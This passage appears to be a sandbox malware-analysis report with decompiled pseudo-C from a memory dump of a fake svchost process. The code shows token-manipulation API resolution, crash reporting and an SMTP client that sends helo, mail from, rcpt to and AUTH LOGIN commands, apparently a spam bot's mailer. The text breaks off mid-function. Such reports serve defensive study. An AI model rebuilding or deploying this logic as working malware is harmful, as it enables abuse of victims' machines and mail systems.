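To use it on the real artefact, read the .sdmp region into `image` instead of `SAMPLE_IMAGE`; offsets are relative to the dump start, so add 0x02510000 to obtain the virtual address of each string, which is what the GetProcAddress call sites push before the call.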

APIs
• LoadLibraryA.KERNEL32(ntdll.dll,00000000,02511839,02519646), ref: 02511012
• GetProcAddress.KERNEL32(00000000,RtlExpandEnvironmentStrings_U), ref: 025110C2
• GetProcAddress.KERNEL32(00000000,RtlSetLastWin32Error), ref: 025110E1
• GetProcAddress.KERNEL32(00000000,NtTerminateProcess), ref: 02511101
• GetProcAddress.KERNEL32(00000000,RtlFreeSid), ref: 02511121
• GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 02511140
• GetProcAddress.KERNEL32(00000000,NtSetInformationThread), ref: 02511160
• GetProcAddress.KERNEL32(00000000,NtSetInformationToken), ref: 02511180
• GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0251119F
• GetProcAddress.KERNEL32(00000000,NtClose), ref: 025111BF
• GetProcAddress.KERNEL32(00000000,NtOpenProcessToken), ref: 025111DF
• GetProcAddress.KERNEL32(00000000,NtDuplicateToken), ref: 025111FE
• GetProcAddress.KERNEL32(00000000,RtlAllocateAndInitializeSid), ref: 0251121A
Strings
Memory Dump Source
• Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: NtClose$NtDuplicateToken$NtFilterToken$NtOpenProcessToken$NtQueryInformationToken$NtSetInformationThread$NtSetInformationToken$NtTerminateProcess$RtlAllocateAndInitializeSid$RtlExpandEnvironmentStrings_U$RtlFreeSid$RtlInitUnicodeString$RtlLengthSid$RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
• API String ID: 2238633743-3228201535
• Opcode ID: 2e131e1efce7ea8f378ca2cc9855fd4d222cd7cc1896c71d7392d616d65ab324
• Instruction ID: b5e76182aad7eeae80e5893604cc7d48fb1c0d03db4ded5744b59bee8e33ca50
• Opcode Fuzzy Hash: 2e131e1efce7ea8f378ca2cc9855fd4d222cd7cc1896c71d7392d616d65ab324
• Instruction Fuzzy Hash: 21518F71E82E11B7E7348F69E8407523AA4734B324F0687969A29F21D0D778C09DEF5D
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 91%
			E0251B211(FILETIME* _a4, CHAR* _a8, signed int _a12) {
				struct _FILETIME _v12;
				struct _SYSTEMTIME _v28;
				CHAR* _v32;
				CHAR* _v36;
				CHAR* _v40;
				CHAR* _v44;
				CHAR* _v48;
				CHAR* _v52;
				CHAR* _v56;
				CHAR* _v60;
				CHAR* _v64;
				CHAR* _v68;
				CHAR* _v72;
				CHAR* _v76;
				CHAR* _v80;
				CHAR* _v84;
				CHAR* _v88;
				CHAR* _v92;
				CHAR* _v96;
				CHAR* _v100;
				CHAR* _v104;
				struct _TIME_ZONE_INFORMATION _v276;
				long _t77;
				signed int _t80;
				signed int _t93;
				signed int _t101;
				signed int _t102;
				CHAR* _t103;
				signed int _t104;
				signed short _t106;
				signed short _t109;
				signed int _t114;
				signed int _t115;
				void* _t117;

				_v56 = "Sun";
				_v52 = "Mon";
				_v48 = "Tue";
				_v44 = "Wed";
				_v40 = "Thu";
				_v36 = "Fri";
				_v32 = "Sat";
				_v104 = "Jan";
				_v100 = "Feb";
				_v96 = "Mar";
				_v92 = "Apr";
				_v88 = "May";
				_v84 = "Jun";
				_v80 = "Jul";
				_v76 = "Aug";
				_v72 = "Sep";
				_v68 = "Oct";
				_v64 = "Nov";
				_v60 = "Dec";
				if(_a4 != 0) {
					FileTimeToLocalFileTime(_a4,  &_v12);
					FileTimeToSystemTime( &_v12,  &_v28);
				} else {
					GetLocalTime( &_v28);
				}
				_t114 = _a12;
				if(_t114 != 0) {
                                                                                                                                  					SystemTimeToFileTime( &_v28,  &_v12);
                                                                                                                                  					_t93 = E0251ECA5();
                                                                                                                                  					if(_t114 <= 0) {
                                                                                                                                  						_t104 = _t93 %  ~_t114 * 0x23c34600;
                                                                                                                                  						_v12.dwLowDateTime = _v12.dwLowDateTime - _t104;
                                                                                                                                  						asm("sbb [ebp-0x4], ebx");
                                                                                                                                  					} else {
                                                                                                                                  						_t104 = _t93 % _t114 * 0x23c34600;
                                                                                                                                  						_v12.dwLowDateTime = _v12.dwLowDateTime + _t104;
                                                                                                                                  						asm("adc [ebp-0x4], ebx");
                                                                                                                                  					}
                                                                                                                                  					FileTimeToSystemTime( &_v12,  &_v28);
                                                                                                                                  				}
                                                                                                                                  				_v276.Bias = 0;
                                                                                                                                  				_t77 = GetTimeZoneInformation( &_v276);
                                                                                                                                  				_t101 = _v276.Bias;
                                                                                                                                  				if(_t77 == 2) {
                                                                                                                                  					_t101 = _t101 + _v276.DaylightBias;
                                                                                                                                  				}
                                                                                                                                  				_t102 =  ~_t101;
                                                                                                                                  				asm("cdq");
                                                                                                                                  				_t80 = (_t102 ^ _t104) - _t104;
                                                                                                                                  				if(_v28.wDayOfWeek > 6) {
                                                                                                                                  					_t109 = 6;
                                                                                                                                  					_v28.wDayOfWeek = _t109;
                                                                                                                                  				}
                                                                                                                                  				if(_v28.wMonth == 0) {
                                                                                                                                  					_v28.wMonth = 1;
                                                                                                                                  				}
                                                                                                                                  				if(_v28.wMonth > 0xc) {
                                                                                                                                  					_t106 = 0xc;
                                                                                                                                  					_v28.wMonth = _t106;
                                                                                                                                  				}
                                                                                                                                  				_t103 = "+";
                                                                                                                                  				if(_t102 < 0) {
                                                                                                                                  					_t103 = "-";
                                                                                                                                  				}
                                                                                                                                  				_t115 = 0x3c;
                                                                                                                                  				asm("cdq");
                                                                                                                                  				return wsprintfA(_a8, "%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u",  *((intOrPtr*)(_t117 + (_v28.wDayOfWeek & 0x0000ffff) * 4 - 0x34)), _v28.wDay & 0x0000ffff,  *((intOrPtr*)(_t117 + (_v28.wMonth & 0x0000ffff) * 4 - 0x68)), _v28.wYear & 0x0000ffff, _v28.wHour & 0x0000ffff, _v28.wMinute & 0x0000ffff, _v28.wSecond & 0x0000ffff, _t103, _t80 / _t115, _t80 % _t115);
                                                                                                                                  			}

                                                                                                                                  0x0251b225
                                                                                                                                  0x0251b22c
                                                                                                                                  0x0251b233
                                                                                                                                  0x0251b23a
                                                                                                                                  0x0251b241
                                                                                                                                  0x0251b248
                                                                                                                                  0x0251b24f
                                                                                                                                  0x0251b256
                                                                                                                                  0x0251b25d
                                                                                                                                  0x0251b264
                                                                                                                                  0x0251b26b
                                                                                                                                  0x0251b272
                                                                                                                                  0x0251b279
                                                                                                                                  0x0251b280
                                                                                                                                  0x0251b287
                                                                                                                                  0x0251b28e
                                                                                                                                  0x0251b295
                                                                                                                                  0x0251b29c
                                                                                                                                  0x0251b2a3
                                                                                                                                  0x0251b2ad
                                                                                                                                  0x0251b2c2
                                                                                                                                  0x0251b2d0
                                                                                                                                  0x0251b2af
                                                                                                                                  0x0251b2b3
                                                                                                                                  0x0251b2b3
                                                                                                                                  0x0251b2d2
                                                                                                                                  0x0251b2d7
                                                                                                                                  0x0251b2e1
                                                                                                                                  0x0251b2e7
                                                                                                                                  0x0251b2f0
                                                                                                                                  0x0251b306
                                                                                                                                  0x0251b30c
                                                                                                                                  0x0251b30f
                                                                                                                                  0x0251b2f2
                                                                                                                                  0x0251b2f4
                                                                                                                                  0x0251b2fa
                                                                                                                                  0x0251b2fd
                                                                                                                                  0x0251b2fd
                                                                                                                                  0x0251b31a
                                                                                                                                  0x0251b31a
                                                                                                                                  0x0251b323
                                                                                                                                  0x0251b329
                                                                                                                                  0x0251b32f
                                                                                                                                  0x0251b338
                                                                                                                                  0x0251b33a
                                                                                                                                  0x0251b33a
                                                                                                                                  0x0251b33d
                                                                                                                                  0x0251b341
                                                                                                                                  0x0251b344
                                                                                                                                  0x0251b34b
                                                                                                                                  0x0251b34f
                                                                                                                                  0x0251b350
                                                                                                                                  0x0251b350
                                                                                                                                  0x0251b358
                                                                                                                                  0x0251b35d
                                                                                                                                  0x0251b35d
                                                                                                                                  0x0251b366
                                                                                                                                  0x0251b36a
                                                                                                                                  0x0251b36b
                                                                                                                                  0x0251b36b
                                                                                                                                  0x0251b371
                                                                                                                                  0x0251b376
                                                                                                                                  0x0251b378
                                                                                                                                  0x0251b378
                                                                                                                                  0x0251b37f
                                                                                                                                  0x0251b380
                                                                                                                                  0x0251b3c4

                                                                                                                                  APIs
                                                                                                                                  • GetLocalTime.KERNEL32(0003E800,?,0003E800,00000000), ref: 0251B2B3
                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(00000000,00000000,?,0003E800,00000000), ref: 0251B2C2
                                                                                                                                  • FileTimeToSystemTime.KERNEL32(00000000,0003E800), ref: 0251B2D0
                                                                                                                                  • SystemTimeToFileTime.KERNEL32(0003E800,00000000), ref: 0251B2E1
                                                                                                                                  • FileTimeToSystemTime.KERNEL32(00000000,0003E800), ref: 0251B31A
                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?), ref: 0251B329
                                                                                                                                  • wsprintfA.USER32 ref: 0251B3B7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$File$System$Local$InformationZonewsprintf
                                                                                                                                  • String ID: %s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u$Apr$Aug$Dec$Feb$Fri$Jan$Jul$Jun$Mar$May$Mon$Nov$Oct$Sat$Sep$Sun$Thu$Tue$Wed
                                                                                                                                  • API String ID: 766114626-2976066047
                                                                                                                                  • Opcode ID: c7617cb3ec94e82100e0aa159bc9f0dbe75f54589b3c385022dd801d05f1fb81
                                                                                                                                  • Instruction ID: 10f6daf0dba2f966a9184d0bfac5f0a0c2143a5bb109d8a62cca4405803f83f6
                                                                                                                                  • Opcode Fuzzy Hash: c7617cb3ec94e82100e0aa159bc9f0dbe75f54589b3c385022dd801d05f1fb81
                                                                                                                                  • Instruction Fuzzy Hash: A45128B1E0222CAADF14CFD4D9889EEFBF9BB5A308F105459E501B61D0D3344A9CCB98
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 57%
                                                                                                                                  			E02516511(void* __ecx) {
                                                                                                                                  				signed int _t75;
                                                                                                                                  				signed int _t76;
                                                                                                                                  				int _t78;
                                                                                                                                  				void* _t83;
                                                                                                                                  				signed int _t93;
                                                                                                                                  				void* _t95;
                                                                                                                                  				signed int _t99;
                                                                                                                                  				int _t101;
                                                                                                                                  				int _t115;
                                                                                                                                  				int _t117;
                                                                                                                                  				void* _t118;
                                                                                                                                  				void* _t119;
                                                                                                                                  				void* _t120;
                                                                                                                                  				void* _t122;
                                                                                                                                  				intOrPtr _t135;
                                                                                                                                  				intOrPtr* _t137;
                                                                                                                                  				void* _t139;
                                                                                                                                  				void* _t141;
                                                                                                                                  				void* _t143;
                                                                                                                                  				void* _t144;
                                                                                                                                  				void* _t152;
                                                                                                                                  
                                                                                                                                  				_t122 = __ecx;
                                                                                                                                  				_t139 = _t141 - 0x74;
                                                                                                                                  				_t75 =  *(_t139 + 0x7c);
                                                                                                                                  				_t135 =  *((intOrPtr*)(_t75 + 4));
                                                                                                                                  				_t76 =  *_t75;
                                                                                                                                  				 *(_t139 + 0x7c) = _t76;
                                                                                                                                  				_t78 = wsprintfA(_t139 - 0x898, "\nver=%d date=%s %s\nc=%08x a=%p", 0x5e, "Jan 13 2018", "12:08:32",  *_t76,  *((intOrPtr*)(_t76 + 0xc)));
                                                                                                                                  				_t143 = _t141 - 0x90c + 0x1c;
                                                                                                                                  				_t117 = _t78;
                                                                                                                                  				if(IsBadReadPtr( *( *(_t139 + 0x7c) + 0xc), 8) != 0) {
                                                                                                                                  					E0251E318();
                                                                                                                                  					ExitProcess(0);
                                                                                                                                  				}
                                                                                                                                  				_t83 =  *( *(_t139 + 0x7c) + 0xc);
                                                                                                                                  				__imp__#8( *((intOrPtr*)(_t83 + 4)), E02516511);
                                                                                                                                  				__imp__#8();
                                                                                                                                  				_t118 = _t117 + wsprintfA(_t139 + _t117 - 0x898, " va=%08X%08X uef=%p",  *( *(_t139 + 0x7c) + 0xc),  *( *( *(_t139 + 0x7c) + 0xc)), _t83);
                                                                                                                                  				_t119 = _t118 + wsprintfA(_t139 + _t118 - 0x898, "\n_ax=%p\t_bx=%p\t_cx=%p\t_dx=%p\t_si=%p\t_di=%p\t_bp=%p\t_sp=%p\n",  *((intOrPtr*)(_t135 + 0xb0)),  *((intOrPtr*)(_t135 + 0xa4)),  *((intOrPtr*)(_t135 + 0xac)),  *((intOrPtr*)(_t135 + 0xa8)),  *((intOrPtr*)(_t135 + 0xa0)),  *((intOrPtr*)(_t135 + 0x9c)),  *((intOrPtr*)(_t135 + 0xb4)),  *((intOrPtr*)(_t135 + 0xc4)));
                                                                                                                                  				E0251EE2A(_t122, _t139 - 0x98, 0, 0x108);
                                                                                                                                  				_t144 = _t143 + 0x48;
                                                                                                                                  				 *((intOrPtr*)(_t139 - 0x98)) =  *((intOrPtr*)(_t135 + 0xb8));
                                                                                                                                  				_t93 = 3;
                                                                                                                                  				_push(0);
                                                                                                                                  				_push(0);
                                                                                                                                  				 *(_t139 - 0x8c) = _t93;
                                                                                                                                  				 *((intOrPtr*)(_t139 - 0x94)) = 0;
                                                                                                                                  				_push(0);
                                                                                                                                  				 *(_t139 - 0x5c) = _t93;
                                                                                                                                  				_push(0);
                                                                                                                                  				 *((intOrPtr*)(_t139 - 0x68)) =  *((intOrPtr*)(_t135 + 0xc4));
                                                                                                                                  				 *((intOrPtr*)(_t139 - 0x64)) = 0;
                                                                                                                                  				_t130 =  *((intOrPtr*)(_t135 + 0xb4));
                                                                                                                                  				 *(_t139 - 0x6c) = _t93;
                                                                                                                                  				 *(_t139 + 0x7c) = _t93;
                                                                                                                                  				_push(_t135);
                                                                                                                                  				_push(_t139 - 0x98);
                                                                                                                                  				 *((intOrPtr*)(_t139 - 0x78)) =  *((intOrPtr*)(_t135 + 0xb4));
                                                                                                                                  				 *((intOrPtr*)(_t139 - 0x74)) = 0;
                                                                                                                                  				_push(0);
                                                                                                                                  				while(1) {
                                                                                                                                  					_t95 = GetCurrentProcess();
                                                                                                                                  					__imp__StackWalk64(0x14c, _t95);
                                                                                                                                  					if(_t95 == 0) {
                                                                                                                                  						break;
                                                                                                                                  					}
                                                                                                                                  					_t95 = 0;
                                                                                                                                  					if( *(_t139 + 0x7c) != 0) {
                                                                                                                                  						if( *((intOrPtr*)(_t139 - 0x88)) != 0) {
                                                                                                                                  							_t115 = wsprintfA(_t139 + _t119 - 0x898, "ret=%p\tp1=%p\tp2=%p\tp3=%p\tp4=%p\n",  *((intOrPtr*)(_t139 - 0x88)),  *((intOrPtr*)(_t139 - 0x40)),  *((intOrPtr*)(_t139 - 0x38)),  *((intOrPtr*)(_t139 - 0x30)),  *((intOrPtr*)(_t139 - 0x28)));
                                                                                                                                  							_t144 = _t144 + 0x1c;
                                                                                                                                  							_t119 = _t119 + _t115;
                                                                                                                                  							_t95 = 0;
                                                                                                                                  						}
                                                                                                                                  						 *(_t139 + 0x7c) =  *(_t139 + 0x7c) - 1;
                                                                                                                                  						_push(_t95);
                                                                                                                                  						_push(_t95);
                                                                                                                                  						_push(_t95);
                                                                                                                                  						_push(_t95);
                                                                                                                                  						_push(_t135);
                                                                                                                                  						_push(_t139 - 0x98);
                                                                                                                                  						_push(_t95);
                                                                                                                                  						continue;
                                                                                                                                  					}
                                                                                                                                  					break;
                                                                                                                                  				}
                                                                                                                                  				 *(_t139 + 0x7c) = _t95;
                                                                                                                                  				_t120 = _t119 + wsprintfA(_t139 + _t119 - 0x898, "plgs:");
                                                                                                                                  				 *(_t139 + 0x70) =  *(_t139 + 0x70) & 0x00000000;
                                                                                                                                  				do {
                                                                                                                                  					_t137 = 0x2522c40 +  *(_t139 + 0x70) * 4;
                                                                                                                                  					if( *_t137 != 0) {
                                                                                                                                  						_t99 =  *(_t139 + 0x7c) & 0x80000007;
                                                                                                                                  						if(_t99 < 0) {
                                                                                                                                  							_t152 = (_t99 - 0x00000001 | 0xfffffff8) + 1;
                                                                                                                                  						}
                                                                                                                                  						if(_t152 == 0) {
                                                                                                                                  							_t120 = _t120 + wsprintfA(_t139 + _t120 - 0x898, "\n");
                                                                                                                                  						}
                                                                                                                                  						_t101 = wsprintfA(_t139 + _t120 - 0x898, "\t%d=%p",  *(_t139 + 0x70),  *_t137);
                                                                                                                                  						_t144 = _t144 + 0x10;
                                                                                                                                  						_t120 = _t120 + _t101;
                                                                                                                                  						 *(_t139 + 0x7c) =  *(_t139 + 0x7c) + 1;
                                                                                                                                  					}
                                                                                                                                  					 *(_t139 + 0x70) =  *(_t139 + 0x70) + 1;
                                                                                                                                  				} while ( *(_t139 + 0x70) < 0x20);
                                                                                                                                  				wsprintfA(_t139 + _t120 - 0x898, "\n");
                                                                                                                                  				E0251E8A1(_t130, 1, "localcfg", "except_info", _t139 - 0x898);
                                                                                                                                  				E0251E318();
                                                                                                                                  				return 1;
                                                                                                                                  			}
                                                                                                                                  0x02516511
                                                                                                                                  0x02516512
                                                                                                                                  0x0251651c
                                                                                                                                  0x02516521
                                                                                                                                  0x02516524
                                                                                                                                  0x02516532
                                                                                                                                  0x0251654d
                                                                                                                                  0x0251654f
                                                                                                                                  0x02516552
                                                                                                                                  0x02516564
                                                                                                                                  0x0251674e
                                                                                                                                  0x02516755
                                                                                                                                  0x02516755
                                                                                                                                  0x0251656d
                                                                                                                                  0x02516578
                                                                                                                                  0x02516587
                                                                                                                                  0x025165a3
                                                                                                                                  0x025165e3
                                                                                                                                  0x025165ee
                                                                                                                                  0x025165f9
                                                                                                                                  0x02516600
                                                                                                                                  0x02516606
                                                                                                                                  0x02516607
                                                                                                                                  0x02516608
                                                                                                                                  0x02516609
                                                                                                                                  0x0251660f
                                                                                                                                  0x0251661b
                                                                                                                                  0x0251661c
                                                                                                                                  0x0251661f
                                                                                                                                  0x02516620
                                                                                                                                  0x02516623
                                                                                                                                  0x02516626
                                                                                                                                  0x0251662c
                                                                                                                                  0x0251662f
                                                                                                                                  0x02516632
                                                                                                                                  0x02516639
                                                                                                                                  0x0251663a
                                                                                                                                  0x0251663d
                                                                                                                                  0x02516640
                                                                                                                                  0x0251668a
                                                                                                                                  0x0251668a
                                                                                                                                  0x02516696
                                                                                                                                  0x0251669e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02516643
                                                                                                                                  0x02516648
                                                                                                                                  0x02516650
                                                                                                                                  0x02516671
                                                                                                                                  0x02516673
                                                                                                                                  0x02516676
                                                                                                                                  0x02516678
                                                                                                                                  0x02516678
                                                                                                                                  0x0251667a
                                                                                                                                  0x0251667d
                                                                                                                                  0x0251667e
                                                                                                                                  0x0251667f
                                                                                                                                  0x02516680
                                                                                                                                  0x02516681
                                                                                                                                  0x02516688
                                                                                                                                  0x02516689
                                                                                                                                  0x00000000
                                                                                                                                  0x02516689
                                                                                                                                  0x00000000
                                                                                                                                  0x02516648
                                                                                                                                  0x025166a0
                                                                                                                                  0x025166b3
                                                                                                                                  0x025166b5
                                                                                                                                  0x025166ba
                                                                                                                                  0x025166bd
                                                                                                                                  0x025166c7
                                                                                                                                  0x025166cc
                                                                                                                                  0x025166d1
                                                                                                                                  0x025166d7
                                                                                                                                  0x025166d7
                                                                                                                                  0x025166d8
                                                                                                                                  0x025166eb
                                                                                                                                  0x025166eb
                                                                                                                                  0x025166ff
                                                                                                                                  0x02516701
                                                                                                                                  0x02516704
                                                                                                                                  0x02516706
                                                                                                                                  0x02516706
                                                                                                                                  0x02516709
                                                                                                                                  0x0251670c
                                                                                                                                  0x0251671f
                                                                                                                                  0x02516734
                                                                                                                                  0x0251673c
                                                                                                                                  0x0251674b

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: wsprintf$Processhtonl$CurrentExitReadStackWalk64
                                                                                                                                  • String ID: %d=%p$_ax=%p_bx=%p_cx=%p_dx=%p_si=%p_di=%p_bp=%p_sp=%p$ver=%d date=%s %sc=%08x a=%p$ va=%08X%08X uef=%p$12:08:32$Jan 13 2018$except_info$localcfg$plgs:$ret=%pp1=%pp2=%pp3=%pp4=%p
                                                                                                                                  • API String ID: 2400214276-165278494
                                                                                                                                  • Opcode ID: adfb0f5b4da0657c9cc30d413fb9b705861b3a1cb74b9a5f968b56dff532b552
                                                                                                                                  • Instruction ID: 11c253022b06d596639a0c084fb35aa4c9fce8d2e89d002cf9bee6d3287087a7
                                                                                                                                  • Opcode Fuzzy Hash: adfb0f5b4da0657c9cc30d413fb9b705861b3a1cb74b9a5f968b56dff532b552
                                                                                                                                  • Instruction Fuzzy Hash: 86619E72A40218AFEB609FB4DC45FEA77E9FF09300F104469F959D21A1DB70A948CF58
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 56%
                                                                                                                                  			E0251A7C1(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16) {
                                                                                                                                  				short _v129;
                                                                                                                                  				char _v132;
                                                                                                                                  				char _v1156;
                                                                                                                                  				signed int _t59;
                                                                                                                                  				int _t60;
                                                                                                                                  				void* _t61;
                                                                                                                                  				char* _t62;
                                                                                                                                  				signed int _t63;
                                                                                                                                  				void* _t65;
                                                                                                                                  				signed int _t68;
                                                                                                                                  				signed int _t74;
                                                                                                                                  				signed int _t76;
                                                                                                                                  				signed int _t78;
                                                                                                                                  				signed int _t80;
                                                                                                                                  				void* _t82;
                                                                                                                                  				signed int _t85;
                                                                                                                                  				signed int _t87;
                                                                                                                                  				signed int _t92;
                                                                                                                                  				void* _t96;
                                                                                                                                  				intOrPtr _t102;
                                                                                                                                  				signed int _t103;
                                                                                                                                  				void* _t104;
                                                                                                                                  				int _t121;
                                                                                                                                  				intOrPtr _t123;
                                                                                                                                  				void* _t124;
                                                                                                                                  				CHAR* _t125;
                                                                                                                                  				intOrPtr* _t126;
                                                                                                                                  				intOrPtr* _t127;
                                                                                                                                  				signed int _t129;
                                                                                                                                  				void* _t130;
                                                                                                                                  				void* _t131;
                                                                                                                                  
				_t102 = _a8;
				_t2 = _t102 - 1; // 0x0
				_t59 = _t2;
				_t125 =  &_v132;
				if(_t59 > 0xb) {
					L21:
					_t60 = lstrlenA(_t125);
					_t121 = _t60;
					_t126 = __imp__#19;
					_t61 =  *_t126(_a4, _t125, _t121, 0);
					if(_t61 == _t121) {
						__eflags = _t102 - 6;
						if(_t102 != 6) {
							L28:
							_t127 = __imp__#16;
							_t103 = 0;
							_push(0);
							_v1156 = 0;
							_v132 = 0;
							_push(0x3f6);
							_t62 =  &_v1156;
							while(1) {
								_t63 =  *_t127(_a4, _t62);
								__eflags = _t63;
								if(_t63 <= 0) {
									break;
								}
								_t103 = _t103 + _t63;
								__eflags = _t103 - 0x1f4;
								if(_t103 > 0x1f4) {
									wsprintfA(_a16, "Too big smtp respons (%d bytes)\n", _t103);
									_push(6);
									L72:
									_pop(_t65);
									return _t65;
								}
								__eflags = _v132;
								 *((char*)(_t130 + _t103 - 0x480)) = 0;
								if(_v132 != 0) {
									L33:
									_t68 = E0251EE95( &_v1156,  &_v132);
									__eflags = _t68;
									if(_t68 != 0) {
										break;
									}
									L34:
									_t92 = 0x3f6 - _t103;
									__eflags = _t92;
									_push(0);
									_push(_t92);
									_t62 = _t130 + _t103 - 0x480;
									continue;
								}
								__eflags = _t103 - 3;
								if(_t103 <= 3) {
									goto L34;
								}
								E0251EE08( &_v132,  &_v1156, 4);
								_t131 = _t131 + 0xc;
								__eflags = _v132;
								_v129 = 0x20;
								if(_v132 == 0) {
									goto L34;
								}
								goto L33;
							}
							_t123 = _a8;
							__eflags = _t123 - 7;
							if(_t123 == 7) {
								L23:
								_push(2);
								goto L72;
							}
							__eflags = _t103 - 5;
							if(_t103 <= 5) {
								E0251EF00(_a16, "Too small respons\n");
							} else {
								E0251EE08(_a16,  &_v1156, 0x76);
								_t131 = _t131 + 0xc;
								_a16[0x76] = 0;
							}
							__eflags = _t103 - 5;
							if(_t103 < 5) {
								L71:
								E0251EF00(_a16, "Incorrect respons");
								_push(7);
								goto L72;
							} else {
								__eflags =  *((char*)(_t130 + _t103 - 0x481)) - 0xa;
								if( *((char*)(_t130 + _t103 - 0x481)) != 0xa) {
									goto L71;
								}
								_t104 = E0251EDAC( &_v1156);
								__eflags = _t104 - 0xdc;
								if(_t104 == 0xdc) {
									L50:
									_t129 = 1;
									_t74 = E0251EE95( &_v1156, "ESMTP");
									__eflags = _t74;
									_t52 = _t74 != 0;
									__eflags = _t52;
									 *0x2523668 = _t74 & 0xffffff00 | _t52;
									_t123 = 1;
									L51:
									__eflags = _t123 - 0xc;
									if(_t123 != 0xc) {
										L54:
										__eflags = _t129;
										if(_t129 != 0) {
											goto L23;
										}
										_t76 =  *0x2523630; // 0x0
										__eflags = _t76;
										if(_t76 == 0) {
											L70:
											_push(0xb);
											goto L72;
										}
										__eflags =  *0x2523634 - _t129; // 0x0
										if(__eflags == 0) {
											goto L70;
										}
										__eflags =  *0x2523638 - _t129; // 0x0
										if(__eflags == 0) {
											goto L70;
										}
										__eflags = _t123 - 4;
										if(_t123 != 4) {
											L61:
											_t78 = E0251A699( &_v1156,  *0x2523634);
											__eflags = _t78;
											if(_t78 == 0) {
												_t80 = E0251A699( &_v1156,  *0x2523638);
												__eflags = _t80;
												if(_t80 == 0) {
													__eflags = _t123 - 3;
													if(_t123 == 3) {
														L69:
														_t82 = E0251E819(1, "localcfg", "ip", E025130B5());
														_push( &_v132);
														_t85 = E0251EE95( &_v1156, E0251A7A3(_t82, _t82));
														__eflags = _t85;
														if(_t85 != 0) {
															goto L62;
														}
														goto L70;
													}
													__eflags = _t123 - 4;
													if(_t123 == 4) {
														goto L69;
													}
													__eflags = _t123 - 5;
													if(_t123 == 5) {
														goto L69;
													}
													__eflags = _t123 - 6;
													if(_t123 != 6) {
														goto L70;
													}
													goto L69;
												}
												_push(0xa);
												goto L72;
											}
											L62:
											_push(9);
											goto L72;
										}
										_t87 = E0251A699( &_v1156, _t76);
										__eflags = _t87;
										if(_t87 == 0) {
											goto L61;
										}
										_push(8);
										goto L72;
									}
									__eflags = _t104 - 0x217;
									if(_t104 != 0x217) {
										goto L54;
									}
									_push(0xf);
									goto L72;
								}
								__eflags = _t104 - 0xfa;
								if(_t104 == 0xfa) {
									goto L50;
								}
								__eflags = _t104 - 0x162;
								if(_t104 == 0x162) {
									goto L50;
								}
								__eflags = _t104 - 0xdd;
								if(_t104 == 0xdd) {
									goto L50;
								}
								__eflags = _t104 - 0x14e;
								if(_t104 == 0x14e) {
									goto L50;
								}
								__eflags = _t104 - 0xeb;
								if(_t104 == 0xeb) {
									goto L50;
								}
								_t129 = 0;
								goto L51;
							}
						}
						_t124 = 5;
						_t96 =  *_t126(_a4, "\r\n.\r\n", _t124, 0);
						__eflags = _t96 - _t124;
						if(_t96 == _t124) {
							goto L28;
						}
						wsprintfA(_a16, "Error sending command (sent = %d/%d)\n", _t96, _t124);
						return _t124;
					}
					if(_t102 != 7) {
						wsprintfA(_a16, "Error sending command (sent = %d/%d)\n", _t61, _t121);
						_push(5);
						goto L72;
					}
					goto L23;
				}
				switch( *((intOrPtr*)(_t59 * 4 +  &M0251AB51))) {
					case 0:
						goto L28;
					case 1:
						_push(_a12);
						_t100 =  &_v132;
						if( *0x2523668 == 0) {
							_push("helo %s\r\n");
						} else {
							_push("ehlo %s\r\n");
						}
                                                                                                                                  						goto L4;
                                                                                                                                  					case 2:
                                                                                                                                  						_push(_a12);
                                                                                                                                  						_push("mail from:<%s>\r\n");
                                                                                                                                  						goto L14;
                                                                                                                                  					case 3:
                                                                                                                                  						_push(_a12);
                                                                                                                                  						_push("rcpt to:<%s>\r\n");
                                                                                                                                  						L14:
                                                                                                                                  						__eax =  &_v132;
                                                                                                                                  						L4:
                                                                                                                                  						wsprintfA(_t100, ??);
                                                                                                                                  						goto L20;
                                                                                                                                  					case 4:
                                                                                                                                  						_push(7);
                                                                                                                                  						_push("data\r\n");
                                                                                                                                  						goto L19;
                                                                                                                                  					case 5:
                                                                                                                                  						goto L21;
                                                                                                                                  					case 6:
                                                                                                                                  						_push(7);
                                                                                                                                  						_push("quit\r\n");
                                                                                                                                  						goto L19;
                                                                                                                                  					case 7:
                                                                                                                                  						goto L21;
                                                                                                                                  					case 8:
                                                                                                                                  						_push(0xd);
                                                                                                                                  						_push("AUTH LOGIN\r\n");
                                                                                                                                  						L19:
                                                                                                                                  						__eax =  &_v132;
                                                                                                                                  						_push( &_v132);
                                                                                                                                  						__eax = E0251EE08();
                                                                                                                                  						goto L20;
                                                                                                                                  					case 9:
                                                                                                                                  						__eax = _a12;
                                                                                                                                  						_t9 = __eax + 1; // 0x1
                                                                                                                                  						__edx = _t9;
                                                                                                                                  						do {
